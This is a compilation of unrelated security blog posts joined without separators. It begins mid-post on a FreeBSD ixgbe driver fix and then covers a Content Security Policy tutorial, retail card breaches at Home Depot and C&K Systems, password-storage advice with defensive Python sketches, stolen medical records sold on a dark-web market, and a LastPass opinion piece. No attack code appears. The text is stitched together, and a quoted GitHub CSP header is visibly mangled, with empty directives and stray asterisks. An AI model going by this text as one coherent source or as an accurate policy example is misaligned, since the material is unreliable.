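Running this shows the first flow should hash to ring 2 but was observed on ring 3, and the second the other way around, which is exactly the misbehaviour described.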

It also only happened when I was sending traffic to more than one receive ring. Everything was okay if I just transmitted to a single receive ring.

Luckily for me, some developers from Verisign saw some odd behaviour in their TCP stress testing and had dug in a bit further. They were seeing corrupted frames on the receive side that looked a lot like internal NIC configuration state. They figured out that the ixgbe(4) driver wasn't initialising the flow director and receive units correctly - the FreeBSD driver was not correctly setting up the amount of memory each was allocated on the NIC and they were overlapping. They also found a handful of incorrectly handled errors and double-freed mbufs.

So, with that all fixed, their TCP problem went away and my UDP tests started properly behaving themselves. Now all the flows are ending up on the right CPUs.

The flow director code was also dynamically programming flows into the NIC to try and rebalance traffic. Trouble is, I think it's a bit buggy and it's likely not working well with large receive offload (LRO).

What's it mean for normal people? Well, it's fixed in FreeBSD-HEAD now. I'm hoping I or someone else will backport it to FreeBSD-10 soon. It fixes my UDP tests - now I hit around 1.3 million packets per second transmit and receive on my test rig; the server now has around 10-15% CPU free. It also fixed issues that Verisign were seeing with their high transaction rate TCP tests. I'm hoping that it fixes the odd corner cases that people have seen with Intel 10 gigabit hardware on FreeBSD and makes LRO generally more useful and stable.

Next up - some code refactoring, then finishing off IPv6 RSS!


I recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example of how to get IT security right.

The main reason CSP exists is cross-site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage, this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.

CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is that the web server sends a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly, CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferably, CSP should be part of the development process right from the beginning. If you start a web project, keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS free because it doesn't use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.

This is an extremely simple CSP policy. To give you an idea of what a more realistic policy looks like, here is the one from GitHub:
Content-Security-Policy: default-src *; script-src; object-src; style-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data: * * *; media-src 'none'; frame-src 'self'; font-src; connect-src 'self'

Reporting feature

You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something via CSP, it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support, Internet Explorer being the main offender), and we want to know if our policy breaks anything that is supposed to work. The way this works is that a JSON document with the details is sent via a POST request to the URL given.
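For illustration, the POSTed body looks roughly like this (the field names follow the CSP 1.0 reporting format; the concrete values here are made up):

```python
import json

# A made-up example of the JSON body a browser POSTs to the report-uri
# endpoint when it blocks a resource.
sample_report = """
{
  "csp-report": {
    "document-uri": "https://example.com/page.html",
    "violated-directive": "img-src 'self'",
    "blocked-uri": "https://ads.example.net/pixel.png"
  }
}
"""

report = json.loads(sample_report)["csp-report"]
print(report["violated-directive"])  # which policy rule was violated
print(report["blocked-uri"])         # which resource got blocked
```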

While this sounds really neat in theory, in practice I found it to be quite disappointing. As I said above, I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However, I get lots of them and they are all false positives. The problem is browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS Everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this, and whether this is something that should be reported as a bug either to the browser vendors or the extension developers.


If you start a web project, use CSP. If you have a web page that needs extra security, use CSP (my bank doesn't - does yours?). CSP reporting is neat, but its usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.

Buffer overflows were first documented in 1972 and they are still the source of many security issues. Fixing them for good is trickier, but it is also possible.

Home Depot said today that cyber criminals armed with custom-built malware stole an estimated 56 million debit and credit card numbers from its customers between April and September 2014. That disclosure officially makes the incident the largest retail card breach on record.

The disclosure, the first real information about the damage from a data breach that was initially disclosed on this site Sept. 2, also sought to assure customers that the malware used in the breach has been eliminated from its U.S. and Canadian store networks.

“To protect customer data until the malware was eliminated, any terminals identified with malware were taken out of service, and the company quickly put in place other security enhancements,” the company said via press release (PDF). “The hackers’ method of entry has been closed off, the malware has been eliminated from the company’s systems, and the company has rolled out enhanced encryption of payment data to all U.S. stores.”

That “enhanced payment protection,” the company said, involves new payment security protection “that locks down payment data through enhanced encryption, which takes raw payment card information and scrambles it to make it unreadable and virtually useless to hackers.”

“Home Depot’s new encryption technology, provided by Voltage Security, Inc., has been tested and validated by two independent IT security firms,” the statement continues. “The encryption project was launched in January 2014. The rollout was completed in all U.S. stores on Saturday, September 13, 2014. The rollout to Canadian stores will be completed by early 2015.”

The remainder of the statement delves into updated fiscal guidance for investors on what Home Depot believes this breach may cost the company in 2014. But absent from the statement is any further discussion about the timeline of this breach, or information about how forensic investigators believe the attackers may have installed the malware mostly on Home Depot’s self-checkout systems — something which could help explain why this five-month breach involves just 56 million cards instead of many millions more.

As to the timeline, multiple financial institutions report that the alerts they’re receiving from Visa and MasterCard about specific credit and debit cards compromised in this breach suggest that the thieves were stealing card data from Home Depot’s cash registers up until Sept. 7, 2014, a full five days after news of the breach first broke.

The Target breach lasted roughly three weeks, but it exposed some 40 million debit and credit cards because hackers switched on their card-stealing malware during the busiest shopping season of the year. Prior to the Home Depot breach, the record for the largest retail card breach went to TJX, which lost some 45.6 million cards.

While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, and it doesn’t discriminate against anyone in particular. It just works™.

The key requirement for maintaining the security of a secret-based authentication mechanism is the secrecy of the secret (password). It is therefore very important for the designer of network applications to regard the safety of passwords as essential, and to do their best to protect them.

In particular, the developer can affect the security of passwords in three ways:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging users to follow best practices.
I will expand on each of these in order.

Security of server-side key storage

For secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since this is valuable information, it should be especially well protected, so that even in case of unauthorized access to the system the attacker cannot obtain it easily.

This can be achieved through the use of key derivation functions, for example. In this case, a derived key is computed from the user-provided password and used in the system. With a good design, the password need never leave the client’s computer — it can be converted straight to the derived key there, and the derived key used from that point forward. The best an attacker could then obtain is the derived key, with no trivial way of recovering the original secret.
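A minimal sketch of this scheme in Python, using PBKDF2 from the standard library (the function names, salt size and iteration count here are illustrative choices, not prescriptions from this article):

```python
import hashlib
import hmac
import os

def derive_key(password: str, salt: bytes, iterations: int = 200_000) -> bytes:
    """Derive a fixed-length key from the password; the server stores only
    the salt and the derived key, never the password itself."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)

# Registration: generate a random per-user salt and store (salt, derived key).
salt = os.urandom(16)
stored = derive_key("correct horse battery staple", salt)

# Login: re-derive from the submitted password and compare in constant time.
candidate = derive_key("correct horse battery staple", salt)
assert hmac.compare_digest(stored, candidate)
```

In a webapp the derivation could even run client-side, so that only the derived key ever crosses the wire; an attacker who dumps the database still faces the cost of the key derivation for every guess.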

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application has no read or write access to the secret database. Instead, a proxy service provides the necessary primitives, such as:

  • authenticating the user,
  • changing the user’s password,
  • and resetting the user’s password.
It is crucial that none of these primitives can be used without proving the necessary user authorization. The service must provide no means of obtaining the current password, or of setting a new one, without that proof. For example, a password reset would have to be confirmed using an authentication token sent to the user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, bypassing the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only an appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password-setting functions. If a bug in the application serves as a backdoor into the system, the attacker still lacks sufficient privileges to read the passwords.
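To illustrate the shape of such a service (this is a hypothetical in-process sketch, not a real PAM or LDAP interface): the application only ever calls the primitives below and never touches the underlying store.

```python
import hashlib
import hmac
import os
import secrets

class PasswordService:
    """Sketch of a privileged password service. The application calls only
    these methods; the store itself stays private to the service."""

    def __init__(self):
        self._store = {}   # user -> (salt, derived key)
        self._resets = {}  # user -> outstanding reset token

    def _set(self, user, password):
        salt = os.urandom(16)
        key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        self._store[user] = (salt, key)

    def register(self, user, password):
        self._set(user, password)

    def authenticate(self, user, password):
        if user not in self._store:
            return False
        salt, key = self._store[user]
        cand = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        return hmac.compare_digest(key, cand)

    def change_password(self, user, old, new):
        # Changing the password requires proving knowledge of the old one.
        if not self.authenticate(user, old):
            return False
        self._set(user, new)
        return True

    def request_reset(self, user):
        # The token would be e-mailed to the user directly by this service,
        # bypassing the potentially compromised application.
        token = secrets.token_urlsafe(32)
        self._resets[user] = token
        return token

    def reset_password(self, user, token, new):
        # A wrong token consumes the pending reset (single attempt).
        if not secrets.compare_digest(self._resets.pop(user, ""), token):
            return False
        self._set(user, new)
        return True
```

Note that there is no method returning a password or a hash: every primitive either proves authorization or fails.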

Security of secret transmission

The authentication process, and other functions that involve transmitting secrets over the network, are the most security-sensitive operations in a password’s lifetime.

This topic has been satisfactorily covered many times, so I will just summarize the key points briefly:

  1. Always use a secured (TLS) connection, both for authentication and for post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desirable when accessing security-critical data, such as when changing the e-mail address.
  3. Protect the secrets as early as possible. For example, if a derived key is used for authentication, prefer deriving it client-side before the request is sent. In webapps, this can be done in ECMAScript.
  4. Use secure authentication methods where possible. For example, challenge-response authentication avoids transmitting the secret at all.
  5. Provide alternative authentication methods to reduce use of the secret. Asymmetric-key methods (such as client certificates or SSH public-key authentication) are both convenient and secure. One-time passwords are useful on public terminals that cannot be trusted to be free of keyloggers.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, use the same TOTP parameters as Google Authenticator, effectively letting your users reuse the many applications designed for that purpose.
  7. And most importantly, never send the user’s password back or display it. To prevent typos, ask the user to type the password twice. For password recovery, generate and send a pseudorandom authorization token, and ask the user to set a new password after using it.
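On the TOTP point: the parameters Google Authenticator uses (HMAC-SHA1, 6 digits, 30-second time step, base32-encoded shared secret) are exactly the RFC 6238 defaults, and a generator fits in a few lines of standard-library Python — a sketch, not production code:

```python
import base64
import hmac
import struct
import time

def totp(secret_b32, for_time=None, digits=6, period=30):
    """RFC 6238 TOTP with the parameters Google Authenticator uses:
    HMAC-SHA1, 6 digits, 30-second period, base32-encoded secret."""
    key = base64.b32decode(secret_b32.upper())
    now = time.time() if for_time is None else for_time
    counter = struct.pack(">Q", int(now // period))       # 8-byte big-endian
    digest = hmac.new(key, counter, "sha1").digest()
    offset = digest[-1] & 0x0F                            # dynamic truncation
    number = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(number % 10 ** digits).zfill(digits)

# RFC 6238 test vector: ASCII secret "12345678901234567890" at time 59.
secret = base64.b32encode(b"12345678901234567890").decode()
assert totp(secret, for_time=59) == "287082"
```

The server simply compares the submitted code against `totp(secret)` (usually also accepting the adjacent time steps to tolerate clock drift).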

Best practices for user management of passwords

With server-side key storage and secret transmission secured, the only potential weakness left is the user’s system. While the application administrator can’t — and often shouldn’t — control it, they should encourage users to follow best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, a weak password should merely trigger a warning rather than a fatal error.
  2. Using different passwords for separate applications, to limit the damage if an attack on one of them obtains the secret.
  3. If the user can’t memorize the passwords, using a dedicated, encrypted key store or a secure password-derivation method. Examples of the former include the built-in browser and system-wide password stores, as well as dedicated applications such as KeePass. An example of the latter is Entropass, which uses a user-provided master password and a salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy on when the password can be requested and how the authenticity of the application can be verified.
A key point is that all these good practices should be encouraged; the developer should never attempt to force them. Any limitations on allowed passwords should be purely technical, and flexible.
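A warn-don’t-reject policy might look like the following sketch (the 50-bit threshold and the naive charset-based entropy estimate are illustrative; a real strength meter, such as zxcvbn, also checks dictionaries and keyboard patterns):

```python
import math
import string

def estimate_entropy_bits(password: str) -> float:
    """Rough estimate: length times log2 of the apparent character pool."""
    pool = 0
    if any(c in string.ascii_lowercase for c in password):
        pool += 26
    if any(c in string.ascii_uppercase for c in password):
        pool += 26
    if any(c in string.digits for c in password):
        pool += 10
    if any(c not in string.ascii_letters + string.digits for c in password):
        pool += 33  # printable ASCII punctuation and space
    return len(password) * math.log2(pool) if pool else 0.0

def check_password(password: str) -> list:
    """Return warnings for weak passwords; only a technical limit is fatal."""
    if len(password.encode("utf-8")) > 255:
        raise ValueError("password exceeds the technical 255-byte limit")
    warnings = []
    if estimate_entropy_bits(password) < 50:
        warnings.append("This password looks weak; consider a longer one.")
    return warnings
```

The user who insists on a weak password gets the warning and keeps the choice; only the generous technical limit is enforced.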

If there is a minimum length for passwords, it should focus only on withstanding the first round of a brute-force attack. Technically speaking, any such limitation reduces entropy, since the attacker can safely omit the short passwords. However, with the number of possibilities growing exponentially in password length, this hardly matters.
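A quick back-of-the-envelope check of that claim, over the 95 printable ASCII characters (the length choices here are just an example):

```python
# Fraction of the search space up to 12 characters that a minimum length
# of 8 lets the attacker skip: all passwords of length 0..7.
POOL = 95  # printable ASCII characters

shorter_than_8 = sum(POOL ** k for k in range(8))   # lengths 0..7
up_to_12 = sum(POOL ** k for k in range(13))        # lengths 0..12
print(f"{shorter_than_8 / up_to_12:.2e}")           # on the order of 1e-10
```

The skipped passwords are a vanishing fraction of the space, so the entropy “lost” to the minimum-length rule is negligible compared to what it gains.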

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making passwords more predictable. Think of the sites that require the password to contain at least one digit: how many of their users have passwords ending with the digit one (1), or with their birth year?

The worst offenders are the sites that do not support setting your own password at all, and instead force you to use one generated by some pseudo-random algorithm. Simply put, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting a low upper limit on password length is not a good idea either. It is reasonable to set some technical limit, say, 255 bytes of printable ASCII characters. Setting it much lower, however, may actually weaken some users’ passwords and reject some derived keys.

Lastly, the service should clearly state when it may ask for the user’s password and how to verify the authenticity of the request. This can involve generic instructions on TLS certificate and domain-name checks; it may also include site-specific measures, such as user-specific images on the login form.

Having a transparent policy for security-related announcements, along with an information page, is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP-address change can be preceded by a GPG-signed e-mail announcement.

The malicious software that unknown thieves used to steal credit and debit card numbers in the data breach at Home Depot this year was installed mainly on payment systems in the self-checkout lanes at retail stores, according to sources close to the investigation. The finding could mean thieves stole far fewer cards during the almost five-month breach than they might have otherwise.

A self-checkout lane at a Home Depot in N. Virginia.
Since news of the Home Depot breach first broke on Sept. 2, this publication has been in constant contact with multiple financial institutions that are closely monitoring daily alerts from Visa and MasterCard for reports about new batches of accounts that the card associations believe were compromised in the break-in. Many banks have been bracing for a financial hit that is much bigger than the exposure caused by the breach at Target, which lasted only three weeks and exposed 40 million cards.

But so far, banking sources say Visa and MasterCard have been reporting far fewer compromised cards than expected given the length of the Home Depot exposure.

Sources now tell KrebsOnSecurity that in a conference call with financial institutions today, officials at MasterCard shared several updates from the ongoing forensic investigation into the breach at the nationwide home improvement store chain. The card brand reportedly told banks that at this time it is believed that only self-checkout terminals were impacted in the breach, but stressed that the investigation is far from complete.

MasterCard also reportedly relayed that the investigation to date found evidence of compromise at approximately 1,700 of the nearly 2,200 U.S. stores, with another 112 stores in Canada potentially affected.

Officials at MasterCard declined to comment. Home Depot spokeswoman Paula Drake also declined to comment, except to say that, “Our investigation is continuing, and unfortunately we’re not going to comment on other reports right now.”

How much are your medical records worth in the cybercrime underground? This week, KrebsOnSecurity discovered medical records being sold in bulk for as little as $6.40 apiece. The digital documents, several of which were obtained by sources working with this publication, were apparently stolen from a Texas-based life insurance company that now says it is working with federal authorities on an investigation into a possible data breach.

The “Fraud Related” section of the Evolution Market.
Purloined medical records are among the many illicit goods for sale on the Evolution Market, a black market bazaar that traffics mostly in narcotics and fraud-related goods — including plenty of stolen financial data. Evolution cannot be reached from the regular Internet. Rather, visitors can only browse the site using Tor, software that helps users disguise their identity by bouncing their traffic between different servers, and by encrypting that traffic at every hop along the way.

Last week, a reader alerted this author to a merchant on Evolution Market nicknamed “ImperialRussia” who was advertising medical records for sale. ImperialRussia was hawking his goods as “fullz” — street slang for a package of all the personal and financial records that thieves would need to fraudulently open up new lines of credit in a person’s name.

Each document for sale by this seller includes the would-be identity theft victim’s name, their medical history, address, phone and driver license number, Social Security number, date of birth, bank name, routing number and checking/savings account number. Customers can purchase the records using the digital currency Bitcoin.

A set of five fullz retails for $40 ($8 per record). Buy 20 fullz and the price drops to $7 per record. Purchase 50 or more fullz, and the per record cost falls to just $6.40 — roughly the price of a value meal at a fast food restaurant. Incidentally, even at $8 per record, that’s cheaper than the price most stolen credit cards fetch on the underground markets.

Imperial Russia’s ad pimping medical and financial records stolen from a Texas life insurance firm.
“Live and Exclusive database of US FULLZ from an insurance company, particularly from NorthWestern region of U.S.,” ImperialRussia’s ad on Evolution enthuses. The pitch continues:

“Most of the fullz come with EXTRA FREEBIES inside as additional policyholders. All of the information is accurate and confirmed. Clients are from an insurance company database with GOOD to EXCELLENT credit score! I, myself was able to apply for credit cards valued from $2,000 – $10,000 with my fullz. Info can be used to apply for loans, credit cards, lines of credit, bank withdrawal, assume identity, account takeover.”

Sure enough, the source who alerted me to this listing had obtained numerous fullz from this seller. All of them contained the personal and financial information on people in the Northwest United States (mostly in Washington state) who’d applied for life insurance through American Income Life, an insurance firm based in Waco, Texas.

American Income Life referred all calls to the company’s parent firm — Torchmark Corp., an insurance holding company in McKinney, Texas. This publication shared with Torchmark the records obtained from Imperial Russia. In response, Michael Majors, vice president of investor relations at Torchmark, said that the FBI and Secret Service were assisting the company in an ongoing investigation, and that Torchmark expected to begin the process of notifying affected consumers this week.

“We’re aware of the matter and we’ve been working with law enforcement on an ongoing investigation,” Majors said, after reviewing the documents shared by KrebsOnSecurity. “It looks like we’re working on the same matter that you’re inquiring about.”

Majors declined to answer additional questions, such as whether Torchmark has uncovered the source of the data breach and stopped the leakage of customer records, or when the company believes the breach began. Interestingly, ImperialRussia’s first post offering this data is dated more than three months ago, on June 15, 2014. Likewise, the insurance application documents shared with Torchmark by this publication also were dated mid-2014.

The financial information in the stolen life insurance applications includes the checking and/or savings account information of the applicant, and is collected so that American Income can pre-authorize payments and automatic monthly debits in the event the policy is approved. In a four-page discussion thread on Imperial Russian’s sales page at Evolution, buyers of this stolen data took turns discussing the quality of the information and its various uses, such as how one can use automated phone systems to verify the available balance of an applicant’s bank account.

Jessica Johnson, a Washington state resident whose records were among those sold by ImperialRussia, said in a phone interview that she received a call from a credit bureau this week after identity thieves tried to open two new lines of credit in her name.

“It’s been a nightmare,” she said. “Yesterday, I had all these phone calls from the credit bureau because someone tried to open two new credit cards in my name. And the only reason they called me was because I already had a credit card with that company and the company thought it was weird, I guess.”

ImperialRussia discusses his wares with potential and previous buyers.
More than 1.8 million people were victims of medical ID theft in 2013, according to a report from the Ponemon Institute, an independent research group. I suspect that many of these folks had their medical records stolen and used to open new lines of credit in their names, or to conduct tax refund fraud with the Internal Revenue Service (IRS).

Placing a fraud alert or freeze on your credit file is a great way to block identity thieves from hijacking your good name. For pointers on how to do that, as well as other tips on how to avoid becoming a victim of ID theft, check out this story.

Adobe has released a security update for its Acrobat and PDF Reader products that fixes at least eight critical vulnerabilities in Mac and Windows versions of the software. If you use either of these programs, please take a minute to update now.

Users can manually check for updates by choosing Help > Check for Updates. Adobe Reader users on Windows also can get the latest version here; Mac users, here.

Adobe said it is not aware of exploits or active attacks in the wild against any of the flaws addressed in this update. More information about the patch is available at this link.

For those seeking a lightweight, free alternative to Adobe Reader, check out Sumatra PDF. Foxit Reader is another popular alternative, although it seems to have become less lightweight in recent years.

C&K Systems Inc., a third-party payment vendor blamed for a credit and debit card breach at more than 330 Goodwill locations nationwide, disclosed this week that the intrusion lasted more than 18 months and has impacted at least two other organizations.

On July 21, 2014, this site broke the news that multiple banks were reporting indications that Goodwill Industries had suffered an apparent breach that led to the theft of customer credit and debit card data. Goodwill later confirmed that the breach impacted a portion of its stores, but blamed the incident on an unnamed “third-party vendor.”

Last week, KrebsOnSecurity obtained some internal talking points apparently sent by Goodwill to prepare its member organizations to respond to any calls from the news media about the incident. Those talking points identified the breached third-party vendor as C&K Systems, a retail point-of-sale operator based in Murrells Inlet, S.C.

In response to inquiries from this reporter, C&K released a statement acknowledging that it was informed on July 30 by “an independent security analyst” that its “hosted managed services environment may have experienced unauthorized access.” The company says it then hired an independent cyber investigative team and alerted law enforcement about the incident.

C&K says the investigation determined malicious hackers had access to its systems “intermittently” between Feb. 10, 2013 and Aug. 14, 2014, and that the intrusion led to the installation of a “highly specialized point of sale (POS) infostealer.rawpos malware variant that was undetectable by our security software systems until Sept. 5, 2014,” [link added].

Their statement continues:

“This unauthorized access currently is known to have affected only three (3) customers of C&K, including Goodwill Industries International. While many payment cards may have been compromised, the number of these cards of which we are informed have been used fraudulently is currently less than 25.”

C&K Systems’ full statement is posted here.


C&K Systems has declined to answer direct questions about this breach. As such, it remains unclear exactly how their systems were compromised, information that could no doubt be helpful to other organizations in preventing future breaches. It’s also not clear whether the other two organizations impacted by this breach have or will disclose.

Here are a few thoughts about why we may not have heard about those other two breaches, and why the source of card breaches can very often go unreported.

Point-of-sale malware, like the malware that hit C&K as well as Target, Home Depot, Neiman Marcus and other retailers this past year, is designed to steal the data encoded onto the magnetic stripe on the backs of debit and credit cards. This data can be used to create counterfeit cards, which are then typically used to purchase physical goods at big-box retailers.

The magnetic stripe on a credit or debit card contains several areas, or “tracks,” where cardholder information is stored: “Track 1” includes the cardholder’s name, account number and other data. “Track 2” contains the cardholder’s account number, encrypted PIN and other information, but it does not include the account holder’s name.

An example of Track 1 and Track 2 data, together.
Most U.S. states have data breach laws requiring businesses that experience a breach involving the personal and financial information of their citizens to notify those individuals in a timely fashion. However, few of those notification requirements are triggered unless the data that is lost or stolen includes the consumer’s name (see my reporting on the 2012 breach at Global Payments, e.g.).

This is important because a great many of the underground stores that sell stolen credit and debit data only sell Track 2 data. Translation: If the thieves are only stealing Track 2 data, a breached business may not have an obligation under existing state data breach disclosure laws to notify consumers about a security incident that resulted in the theft of their card data.


Breaches like the one at C&K Systems involving stolen mag stripe data will continue for several years to come, even beyond the much-ballyhooed October 2015 liability shift deadline from Visa and MasterCard.

Much of the retail community is working to meet an October 2015 deadline put in place by MasterCard and Visa to move to chip-and-PIN enabled card terminals at their checkout lanes (in most cases, however, this transition will involve the less-secure chip-and-signature approach). Somewhat embarrassingly, the United States is the last of the G20 nations to adopt this technology, which embeds a small computer chip in each card that makes it much more expensive and difficult (but not impossible) for fraudsters to clone stolen cards.

That October 2015 deadline comes with a shift in liability for merchants who haven’t yet adopted chip-and-PIN (i.e., those merchants not in compliance could find themselves responsible for all of the fraudulent charges on purchases involving chip-enabled cards that were instead merely swiped through a regular mag-stripe card reader at checkout time).

Business Week recently ran a story pointing out that Home Depot’s in-store payment system “wasn’t set up to encrypt customers’ credit- and debit-card data, a gap in its defenses that gave potential hackers a wider window to exploit.” The story observed that although Home Depot “this year purchased a tool that would encrypt customer-payment data at the cash register, two of the former managers say current Home Depot staffers have told them that the installation isn’t complete.”

The crazy aspect of all these breaches over the past year is that we’re only hearing about those intrusions that have been detected. In an era when third-party vendors such as C&K Systems can go 18 months without detecting a break-in, it’s reasonable to assume that the problem is much worse than it seems.

Avivah Litan, a fraud analyst with Gartner Inc., said that at least with stolen credit card data there are mechanisms for banks to report a suspected breached merchant to the card associations. At that point, Visa and MasterCard will aggregate the reports to the suspected breached merchant’s bank, and request that the bank demand that the merchant hire a security firm to investigate. But in the case of breaches involving more personal data — such as Social Security numbers and medical information — very often there are few such triggers, and little recourse for affected consumers.

“It’s usually only the credit and debit card stuff that gets exposed,” Litan said. “Nobody cares if the more sensitive personal data is stolen because nobody is damaged by that except you as the consumer, and anyway you probably won’t have any idea how that data was stolen in the first place.”

Maybe it’s best that most breaches go undisclosed: It’s not clear how much consumers could stand if they knew about them all. In an opinion piece published today, New York Times writer Joe Nocera observed that “seven years have passed between the huge T.J. Maxx breach and the huge Home Depot breach — and nothing has changed.” Nocera asks: “Have we become resigned to the idea that, as a condition of modern life, our personal financial data will be hacked on a regular basis? It is sure starting to seem that way.” Breach fatigue, indeed.

The other observation I’d make about these card breaches is that the entire credit card system in the United States seems currently set up so that one party to a transaction can reliably transfer the blame for an incident to another. The main reason the United States has not yet moved to a more secure standard for handling cards, for example, has a lot to do with the finger pointing and blame game that’s been going on for years between the banks and the retail industry. The banks have said, “If the retailers only started installing chip-and-PIN card readers, we’d start issuing those types of cards.” The retailers respond: “Why should we spend the money upgrading all our payment terminals to handle chip-and-PIN when hardly any banks are issuing those types of cards?” And so it has gone for years.

For its part, C&K systems says it was relying on hardware and software that met current security industry standards but that was nevertheless deficient. Happily, the company reports that it is in the process of implementing point-to-point encryption to block any future attacks on its payment infrastructure.

“What we have learned during this process is that we rely and put our trust in many systems and individuals to help prevent these kinds of things from happening. However, there is no 100% failsafe security solution for hosting Point of Sale environments,” C&K Systems said. Their statement continues:

“The software we host for our customers is from a leading POS company and meets current PCI-DSS requirements of encrypted data in transit and data at rest. Point of sale terminals are vulnerable to memory scraping malware, which catches cards in memory before encryption can occur. Our software vendor is in the process of rolling out a full P2PE solution with tokenization that we anticipate receiving in October 2014. Our experience with the state of today’s threats will help all current and future customers develop tighter security measures to help reduce threat exposure and to make them more cognizant of the APTs that exist today and the impact of the potential threat to their businesses.”

Too many organizations only get religion about security after they’ve had a serious security breach, and unfortunately that inaction usually ends up costing the consumer more in the long run. But that doesn’t mean you have to be further victimized in the process: Be smart about your financial habits.

Using a credit card over a debit card, for example, involves fewer hassles and risks when your card information inevitably gets breached by some merchant. Pay close attention to your monthly statements and report any unauthorized charges immediately. And spend more time and energy protecting yourself from identity theft. Finally, take proactive steps to keep your inbox and your computer from being ravaged by cybercrooks.

The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.13, the “Joachim Fuchsberger” release. This release fixes multiple security vulnerabilities; all users of affected phpMyFAQ versions are encouraged to upgrade to this latest version as soon as possible! A detailed security advisory is available. We also added SQLite3 support, backported from phpMyFAQ 2.9. […]

You probably noticed that in the (frequent) posts talking about security and passwords lately, I keep suggesting LastPass as a password manager. This is the manager that I use myself, and the reason why I came to this one is multi-faceted, but essentially I'm suggesting you use a tool that does not make it more inconvenient to maintain proper password hygiene. Because yes, you should be using different passwords, with a combination of letters, numbers and symbols, but if you have to come up with a new one every time, then things are going to be difficult and you'll just decide to use the same password over and over.

Or you'll use a method for creating "unique" passwords that are actually composed of a fixed part and a variable one (which is what I did for the longest time). And let's be clear: using the same base password suffixed with the name of the site you're signing up for is no protection at all, the moment more than one of your passwords is discovered.

So with convenience being important, because inconvenience just leads to bad security hygiene, LastPass delivers on what I need: it has autofill, so I don't have to open a terminal and run sgeps (like I used to) to get the password out of the store; it generates passwords in the browser, so I don't have to open a terminal and run pwgen; it runs on my cellphone, so I can use it to fetch a password to type somewhere else; and it even auto-fills my passwords in Android apps, so I don't have to use a simple password when dealing with some random website that then maps to an app on my phone. But it also has a few good "security conveniences": you can re-encrypt your vault with a new master password, you can protect it further with a proper OTP pad or a 2FA device, and there are extras such as letting you know if an email you use across services is involved in an account breach.

This does not mean there are no other good password-management tools; I know the names of plenty, but I just looked for one that had the features I cared about, and went with it. I'm happy with LastPass right now. Yes, I need to trust the company and their code a fair bit, but I don't think that just being open source would gain it more trust. Being open source and audited for a long time, sure, but either way it's not a dealbreaker for me. Chrome itself has a password manager; it just doesn't feel suitable for me (no generation, no obvious way to inspect the data from mobile, sometimes bad collation of URLs, and as far as I know no way to change the sync encryption password). It also requires me to have access to my Google account to get at that data.

But the interesting part is how quickly geeks will suggest that you just roll your own, be it with some open-source password manager requiring an external sync system (I did that with sgeps, but it's tied to a single GPG key, so it's not easy for me to use two different hardware smartcards), or even your own sync infrastructure. And this is the answer I really can't stand, because it solves absolutely nothing. Jürgen called it cynical last year, but I think it's even worse than that: it's hypocritical.

